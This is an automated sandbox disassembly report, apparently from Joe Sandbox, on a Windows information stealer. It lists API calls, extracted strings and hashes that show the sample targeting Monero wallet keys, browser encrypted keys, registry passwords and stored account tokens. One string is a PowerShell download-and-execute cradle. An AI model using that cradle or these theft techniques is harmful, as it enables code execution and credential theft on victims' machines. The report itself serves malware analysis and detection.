                          • Part of subcall function 005F8D90: GetFileAttributesA.KERNEL32(00000000,?,005E1B54,?,?,0060564C,?,?,00600E1F), ref: 005F8D9F
                          • Part of subcall function 005E9CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 005E9D39
                          • Part of subcall function 005E99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005E99EC
                          • Part of subcall function 005E99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 005E9A11
                          • Part of subcall function 005E99C0: LocalAlloc.KERNEL32(00000040,?), ref: 005E9A31
                          • Part of subcall function 005E99C0: ReadFile.KERNEL32(000000FF,?,00000000,005E148F,00000000), ref: 005E9A5A
                          • Part of subcall function 005E99C0: LocalFree.KERNEL32(005E148F), ref: 005E9A90
                          • Part of subcall function 005E99C0: CloseHandle.KERNEL32(000000FF), ref: 005E9A9A
                          • Part of subcall function 005F93C0: GlobalAlloc.KERNEL32(00000000,005F43DD,005F43DD), ref: 005F93D3
                        • StrStrA.SHLWAPI(?,0115DE88), ref: 005F43F3
                        • GlobalFree.KERNEL32(?), ref: 005F4512
                          • Part of subcall function 005E9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N^,00000000,00000000), ref: 005E9AEF
                          • Part of subcall function 005E9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,005E4EEE,00000000,?), ref: 005E9B01
                          • Part of subcall function 005E9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N^,00000000,00000000), ref: 005E9B2A
                          • Part of subcall function 005E9AC0: LocalFree.KERNEL32(?,?,?,?,005E4EEE,00000000,?), ref: 005E9B3F
                        • lstrcat.KERNEL32(?,00000000), ref: 005F44A3
                        • StrCmpCA.SHLWAPI(?,006008D1), ref: 005F44C0
                        • lstrcat.KERNEL32(00000000,00000000), ref: 005F44D2
                        • lstrcat.KERNEL32(00000000,?), ref: 005F44E5
                        • lstrcat.KERNEL32(00000000,00600FB8), ref: 005F44F4
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                         • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                        • String ID:
                        • API String ID: 3541710228-0
                        • Opcode ID: a8481607dbe0ecaabc4f3b287284231ef0d3728fd0c804a43ee7556120450511
                        • Instruction ID: 927f1ba9738e41fa4b9ad5895fd691812cbe48ad9210cb6d8ee537d74e4a8292
                        • Opcode Fuzzy Hash: a8481607dbe0ecaabc4f3b287284231ef0d3728fd0c804a43ee7556120450511
                        • Instruction Fuzzy Hash: 697115B6900209ABDB14EBA0DC89FFE7779BF88300F048598F60597181DA75DB45CF92
                        APIs
                          • Part of subcall function 005E12A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 005E12B4
                          • Part of subcall function 005E12A0: RtlAllocateHeap.NTDLL(00000000), ref: 005E12BB
                          • Part of subcall function 005E12A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 005E12D7
                          • Part of subcall function 005E12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 005E12F5
                          • Part of subcall function 005E12A0: RegCloseKey.ADVAPI32(?), ref: 005E12FF
                        • lstrcat.KERNEL32(?,00000000), ref: 005E134F
                        • lstrlen.KERNEL32(?), ref: 005E135C
                        • lstrcat.KERNEL32(?,.keys), ref: 005E1377
                          • Part of subcall function 005FA740: lstrcpy.KERNEL32(00600E17,00000000), ref: 005FA788
                          • Part of subcall function 005FA9B0: lstrlen.KERNEL32(?,011591F8,?,\Monero\wallet.keys,00600E17), ref: 005FA9C5
                          • Part of subcall function 005FA9B0: lstrcpy.KERNEL32(00000000), ref: 005FAA04
                          • Part of subcall function 005FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 005FAA12
                          • Part of subcall function 005FA8A0: lstrcpy.KERNEL32(?,00600E17), ref: 005FA905
                          • Part of subcall function 005F8B60: GetSystemTime.KERNEL32(00600E1A,0115A8D0,006005AE,?,?,005E13F9,?,0000001A,00600E1A,00000000,?,011591F8,?,\Monero\wallet.keys,00600E17), ref: 005F8B86
                          • Part of subcall function 005FA920: lstrcpy.KERNEL32(00000000,?), ref: 005FA972
                          • Part of subcall function 005FA920: lstrcat.KERNEL32(00000000), ref: 005FA982
                        • CopyFileA.KERNEL32(?,00000000,00000001), ref: 005E1465
                          • Part of subcall function 005FA7A0: lstrcpy.KERNEL32(?,00000000), ref: 005FA7E6
                          • Part of subcall function 005E99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005E99EC
                          • Part of subcall function 005E99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 005E9A11
                          • Part of subcall function 005E99C0: LocalAlloc.KERNEL32(00000040,?), ref: 005E9A31
                          • Part of subcall function 005E99C0: ReadFile.KERNEL32(000000FF,?,00000000,005E148F,00000000), ref: 005E9A5A
                          • Part of subcall function 005E99C0: LocalFree.KERNEL32(005E148F), ref: 005E9A90
                          • Part of subcall function 005E99C0: CloseHandle.KERNEL32(000000FF), ref: 005E9A9A
                        • DeleteFileA.KERNEL32(00000000), ref: 005E14EF
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                         • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                        • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                        • API String ID: 3478931302-218353709
                        • Opcode ID: 54dabc7b8eabc20f6f808459c873bfdcb4086cfbdeef351a7ef7106211f10800
                        • Instruction ID: da0d9a1fefbc8f62c9c18d4b08544aba907826a030c5e81588e17bfd019e58b9
                        • Opcode Fuzzy Hash: 54dabc7b8eabc20f6f808459c873bfdcb4086cfbdeef351a7ef7106211f10800
                        • Instruction Fuzzy Hash: 295130F195011E5BCB19EB60DD95AFD773CBF90300F4041A8B74A62091EE746B89CAA6
                        APIs
                          • Part of subcall function 005E72D0: memset.MSVCRT ref: 005E7314
                          • Part of subcall function 005E72D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 005E733A
                          • Part of subcall function 005E72D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 005E73B1
                          • Part of subcall function 005E72D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 005E740D
                          • Part of subcall function 005E72D0: GetProcessHeap.KERNEL32(00000000,?), ref: 005E7452
                          • Part of subcall function 005E72D0: HeapFree.KERNEL32(00000000), ref: 005E7459
                        • lstrcat.KERNEL32(00000000,006017FC), ref: 005E7606
                        • lstrcat.KERNEL32(00000000,00000000), ref: 005E7648
                        • lstrcat.KERNEL32(00000000, : ), ref: 005E765A
                        • lstrcat.KERNEL32(00000000,00000000), ref: 005E768F
                        • lstrcat.KERNEL32(00000000,00601804), ref: 005E76A0
                        • lstrcat.KERNEL32(00000000,00000000), ref: 005E76D3
                        • lstrcat.KERNEL32(00000000,00601808), ref: 005E76ED
                        • task.LIBCPMTD ref: 005E76FB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                        • String ID: :
                        • API String ID: 3191641157-3653984579
                        • Opcode ID: 5e92cf0b9fddc5deee3a6c79dc6fdbac275c600b9e87f747231922cc3f087e1b
                        • Instruction ID: c08452cccc1066ae2d6c8674d3dad0b5b5cf87c3796ebc0e94188b6173e85b14
                        • Opcode Fuzzy Hash: 5e92cf0b9fddc5deee3a6c79dc6fdbac275c600b9e87f747231922cc3f087e1b
                        • Instruction Fuzzy Hash: 03314B7590014AEBCB1CEBA5DC89DFF7B79BF98301B108118F106A7290DB34A947CB52
                        APIs
                        • memset.MSVCRT ref: 005E7314
                        • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 005E733A
                        • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 005E73B1
                        • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 005E740D
                        • GetProcessHeap.KERNEL32(00000000,?), ref: 005E7452
                        • HeapFree.KERNEL32(00000000), ref: 005E7459
                        • task.LIBCPMTD ref: 005E7555
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$EnumFreeOpenProcessValuememsettask
                        • String ID: Password
                        • API String ID: 2808661185-3434357891
                        • Opcode ID: eba5e731eb6f7880d3beba836865dc861dbecf0ddc822f0985ffd949e7c0587d
                        • Instruction ID: 4f397b90fd393904d491312706cf66be9d226b3f214e19f20a5a709ee5abb9f2
                        • Opcode Fuzzy Hash: eba5e731eb6f7880d3beba836865dc861dbecf0ddc822f0985ffd949e7c0587d
                        • Instruction Fuzzy Hash: 09613FB590415D9BDB28DB51DC45FEABBB8BF48300F0081E9E689A6181DB705FC9CFA1
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0115E620,00000000,?,00600E2C,00000000,?,00000000), ref: 005F8130
                        • RtlAllocateHeap.NTDLL(00000000), ref: 005F8137
                        • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 005F8158
                        • __aulldiv.LIBCMT ref: 005F8172
                        • __aulldiv.LIBCMT ref: 005F8180
                        • wsprintfA.USER32 ref: 005F81AC
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                        • String ID: %d MB$@
                        • API String ID: 2774356765-3474575989
                        • Opcode ID: 5f2e9b515db2b3c8c8e610ec6c31b2edc60efc241d885f07e6a3ca0c42664afe
                        • Instruction ID: 1c4b2dc61d0c87b69bfe83c3d09cfa07f0ce312a99defaaa7090d811a3b2cfc0
                        • Opcode Fuzzy Hash: 5f2e9b515db2b3c8c8e610ec6c31b2edc60efc241d885f07e6a3ca0c42664afe
                        • Instruction Fuzzy Hash: 622127B1A44208ABDB14DFD4CC49FBEBBB9FB44B00F104619F705AB280C77869018BA5
                        APIs
                          • Part of subcall function 005FA7A0: lstrcpy.KERNEL32(?,00000000), ref: 005FA7E6
                          • Part of subcall function 005E47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 005E4839
                          • Part of subcall function 005E47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 005E4849
                        • InternetOpenA.WININET(00600DF7,00000001,00000000,00000000,00000000), ref: 005E610F
                        • StrCmpCA.SHLWAPI(?,0115E7B8), ref: 005E6147
                        • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 005E618F
                        • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 005E61B3
                        • InternetReadFile.WININET(?,?,00000400,?), ref: 005E61DC
                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 005E620A
                        • CloseHandle.KERNEL32(?,?,00000400), ref: 005E6249
                        • InternetCloseHandle.WININET(?), ref: 005E6253
                        • InternetCloseHandle.WININET(00000000), ref: 005E6260
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                        • String ID:
                        • API String ID: 2507841554-0
                        • Opcode ID: f7a0ad0ddc7ba4ad2fde1976c66e11f3485b1c91a2e8623d0990d8713b88ab75
                        • Instruction ID: 5e067d985f188a45ba239230992b9521e37967fdfc40c30e3d2d949912935cb3
                        • Opcode Fuzzy Hash: f7a0ad0ddc7ba4ad2fde1976c66e11f3485b1c91a2e8623d0990d8713b88ab75
                        • Instruction Fuzzy Hash: D2519FB1900209AFDB28DF51DC49BEE7BB8FF44340F008098A745A71C0DB746A86CF96
                        APIs
                          • Part of subcall function 005FA740: lstrcpy.KERNEL32(00600E17,00000000), ref: 005FA788
                          • Part of subcall function 005FA9B0: lstrlen.KERNEL32(?,011591F8,?,\Monero\wallet.keys,00600E17), ref: 005FA9C5
                          • Part of subcall function 005FA9B0: lstrcpy.KERNEL32(00000000), ref: 005FAA04
                          • Part of subcall function 005FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 005FAA12
                          • Part of subcall function 005FA920: lstrcpy.KERNEL32(00000000,?), ref: 005FA972
                          • Part of subcall function 005FA920: lstrcat.KERNEL32(00000000), ref: 005FA982
                          • Part of subcall function 005FA8A0: lstrcpy.KERNEL32(?,00600E17), ref: 005FA905
                          • Part of subcall function 005FA7A0: lstrcpy.KERNEL32(?,00000000), ref: 005FA7E6
                        • lstrlen.KERNEL32(00000000), ref: 005EBC9F
                          • Part of subcall function 005F8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 005F8E52
                        • StrStrA.SHLWAPI(00000000,AccountId), ref: 005EBCCD
                        • lstrlen.KERNEL32(00000000), ref: 005EBDA5
                        • lstrlen.KERNEL32(00000000), ref: 005EBDB9
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                        • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                        • API String ID: 3073930149-1079375795
                        • Opcode ID: 1dea62b5275204605f2748de62198b9cc3225254fe2aa62924a150c9b67db6dd
                        • Instruction ID: a9df70112269354acd92730e87cecb7b15b4a4c7c8488ae48ca1767421afc4c1
                        • Opcode Fuzzy Hash: 1dea62b5275204605f2748de62198b9cc3225254fe2aa62924a150c9b67db6dd
                        • Instruction Fuzzy Hash: 26B154B19101099BDB18EBA0CD5ADFE7B39BF94340F404128F60A67095EF786A49CB63
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExitProcess$DefaultLangUser
                        • String ID: *
                        • API String ID: 1494266314-163128923
                        • Opcode ID: 7f1dfbe2e37f54f781a7935dd2677b8abee396945f551736de126aefda67050c
                        • Instruction ID: f768ce4f7509c97586659bf476c5577df6098e7da6ab3fa60b8e745d2935c985
                        • Opcode Fuzzy Hash: 7f1dfbe2e37f54f781a7935dd2677b8abee396945f551736de126aefda67050c
                        • Instruction Fuzzy Hash: C0F05E3090520DEFD358AFE0E90972CBB70FF14703F048198E649C62D0D6744B42DB9A
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 005E4FCA
                        • RtlAllocateHeap.NTDLL(00000000), ref: 005E4FD1
                        • InternetOpenA.WININET(00600DDF,00000000,00000000,00000000,00000000), ref: 005E4FEA
                        • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 005E5011
                        • InternetReadFile.WININET(?,?,00000400,00000000), ref: 005E5041
                        • InternetCloseHandle.WININET(?), ref: 005E50B9
                        • InternetCloseHandle.WININET(?), ref: 005E50C6
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                        • String ID:
                        • API String ID: 3066467675-0
                        • Opcode ID: fd058687f3605e1fd7814bfce8d046bc64cb669c1ef0b569c006ada39ec8a1c2
                        • Instruction ID: e186443fb6d2f8697a153aeaaf2803aefcc8ea961d84b74041357b74ca672f25
                        • Opcode Fuzzy Hash: fd058687f3605e1fd7814bfce8d046bc64cb669c1ef0b569c006ada39ec8a1c2
                        • Instruction Fuzzy Hash: 243107B4A40218ABDB24CF54CC89BDCB7B5FB48704F5081E9FB09A7281D7706A858F99
                        APIs
                        • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 005F8426
                        • wsprintfA.USER32 ref: 005F8459
                        • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 005F847B
                        • RegCloseKey.ADVAPI32(00000000), ref: 005F848C
                        • RegCloseKey.ADVAPI32(00000000), ref: 005F8499
                          • Part of subcall function 005FA7A0: lstrcpy.KERNEL32(?,00000000), ref: 005FA7E6
                        • RegQueryValueExA.ADVAPI32(00000000,0115E608,00000000,000F003F,?,00000400), ref: 005F84EC
                        • lstrlen.KERNEL32(?), ref: 005F8501
                        • RegQueryValueExA.ADVAPI32(00000000,0115E518,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00600B34), ref: 005F8599
                        • RegCloseKey.ADVAPI32(00000000), ref: 005F8608
                        • RegCloseKey.ADVAPI32(00000000), ref: 005F861A
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                        • String ID: %s\%s
                        • API String ID: 3896182533-4073750446
                        • Opcode ID: 4a288b9e1a913d59a34d056ef86759b4ff15620108eb86dda8fba0f61b075f80
                        • Instruction ID: 0e4c49dad18a73cd83a711c6ed9e975cf5e69a62d390621ca60c48af576b3122
                        • Opcode Fuzzy Hash: 4a288b9e1a913d59a34d056ef86759b4ff15620108eb86dda8fba0f61b075f80
                        • Instruction Fuzzy Hash: 8D21E7B191021CABDB28DB54DC85FE9B7B8FF48700F00C599A609A6180DF75AA86CFD5
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 005F76A4
                        • RtlAllocateHeap.NTDLL(00000000), ref: 005F76AB
                        • RegOpenKeyExA.ADVAPI32(80000002,0114BEF8,00000000,00020119,00000000), ref: 005F76DD
                        • RegQueryValueExA.ADVAPI32(00000000,0115E590,00000000,00000000,?,000000FF), ref: 005F76FE
                        • RegCloseKey.ADVAPI32(00000000), ref: 005F7708
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID: Windows 11
                        • API String ID: 3225020163-2517555085
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 005F7734
                        • RtlAllocateHeap.NTDLL(00000000), ref: 005F773B
                        • RegOpenKeyExA.ADVAPI32(80000002,0114BEF8,00000000,00020119,005F76B9), ref: 005F775B
                        • RegQueryValueExA.ADVAPI32(005F76B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 005F777A
                        • RegCloseKey.ADVAPI32(005F76B9), ref: 005F7784
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID: CurrentBuildNumber
                        • API String ID: 3225020163-1022791448
                        APIs
                        • CreateFileA.KERNEL32(:_,80000000,00000003,00000000,00000003,00000080,00000000,?,005F3AEE,?), ref: 005F92FC
                        • GetFileSizeEx.KERNEL32(000000FF,:_), ref: 005F9319
                        • CloseHandle.KERNEL32(000000FF), ref: 005F9327
                        Similarity
                        • API ID: File$CloseCreateHandleSize
                        • String ID: :_$:_
                        • API String ID: 1378416451-3093262757
                        APIs
                        • memset.MSVCRT ref: 005F40D5
                        • RegOpenKeyExA.ADVAPI32(80000001,0115D680,00000000,00020119,?), ref: 005F40F4
                        • RegQueryValueExA.ADVAPI32(?,0115DF30,00000000,00000000,00000000,000000FF), ref: 005F4118
                        • RegCloseKey.ADVAPI32(?), ref: 005F4122
                        • lstrcat.KERNEL32(?,00000000), ref: 005F4147
                        • lstrcat.KERNEL32(?,0115DF00), ref: 005F415B
                        Similarity
                        • API ID: lstrcat$CloseOpenQueryValuememset
                        • String ID:
                        • API String ID: 2623679115-0
                        APIs
                        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005E99EC
                        • GetFileSizeEx.KERNEL32(000000FF,?), ref: 005E9A11
                        • LocalAlloc.KERNEL32(00000040,?), ref: 005E9A31
                        • ReadFile.KERNEL32(000000FF,?,00000000,005E148F,00000000), ref: 005E9A5A
                        • LocalFree.KERNEL32(005E148F), ref: 005E9A90
                        • CloseHandle.KERNEL32(000000FF), ref: 005E9A9A
                        Similarity
                        • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                        • String ID:
                        • API String ID: 2311089104-0
                        Similarity
                        • API ID: String___crt$Typememset
                        • String ID:
                        • API String ID: 3530896902-3916222277
                        APIs
                        • lstrcat.KERNEL32(?,0115DF90), ref: 005F47DB
                          • Part of subcall function 005F8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 005F8E0B
                        • lstrcat.KERNEL32(?,00000000), ref: 005F4801
                        • lstrcat.KERNEL32(?,?), ref: 005F4820
                        • lstrcat.KERNEL32(?,?), ref: 005F4834
                        • lstrcat.KERNEL32(?,0114B6D0), ref: 005F4847
                        • lstrcat.KERNEL32(?,?), ref: 005F485B
                        • lstrcat.KERNEL32(?,0115D980), ref: 005F486F
                          • Part of subcall function 005FA740: lstrcpy.KERNEL32(00600E17,00000000), ref: 005FA788
                          • Part of subcall function 005F8D90: GetFileAttributesA.KERNEL32(00000000,?,005E1B54,?,?,0060564C,?,?,00600E1F), ref: 005F8D9F
                          • Part of subcall function 005F4570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 005F4580
                          • Part of subcall function 005F4570: RtlAllocateHeap.NTDLL(00000000), ref: 005F4587
                          • Part of subcall function 005F4570: wsprintfA.USER32 ref: 005F45A6
                          • Part of subcall function 005F4570: FindFirstFileA.KERNEL32(?,?), ref: 005F45BD
                        Similarity
                        • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                        • String ID:
                        • API String ID: 2540262943-0
                        APIs
                          • Part of subcall function 005FA740: lstrcpy.KERNEL32(00600E17,00000000), ref: 005FA788
                          • Part of subcall function 005FA9B0: lstrlen.KERNEL32(?,011591F8,?,\Monero\wallet.keys,00600E17), ref: 005FA9C5
                          • Part of subcall function 005FA9B0: lstrcpy.KERNEL32(00000000), ref: 005FAA04
                          • Part of subcall function 005FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 005FAA12
                          • Part of subcall function 005FA920: lstrcpy.KERNEL32(00000000,?), ref: 005FA972
                          • Part of subcall function 005FA920: lstrcat.KERNEL32(00000000), ref: 005FA982
                          • Part of subcall function 005FA8A0: lstrcpy.KERNEL32(?,00600E17), ref: 005FA905
                        • ShellExecuteEx.SHELL32(0000003C), ref: 005F2D85
                        Strings
                        • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 005F2CC4
                        • ')", xrefs: 005F2CB3
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 005F2D04
                        • <, xrefs: 005F2D39
                        Similarity
                        • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                        • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        • API String ID: 3031569214-898575020
                        APIs
                        • LocalAlloc.KERNEL32(00000040,?), ref: 005E9F41
                          • Part of subcall function 005FA7A0: lstrcpy.KERNEL32(?,00000000), ref: 005FA7E6
                          • Part of subcall function 005FA740: lstrcpy.KERNEL32(00600E17,00000000), ref: 005FA788
                        Similarity
                        • API ID: lstrcpy$AllocLocal
                        • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                        • API String ID: 4171519190-1096346117
                        APIs
                          • Part of subcall function 005FA740: lstrcpy.KERNEL32(00600E17,00000000), ref: 005FA788
                        • memset.MSVCRT ref: 005F716A
                        Strings
                        • s_, xrefs: 005F7111
                        • s_, xrefs: 005F72AE, 005F7179, 005F717C
                        • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 005F718C
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmp
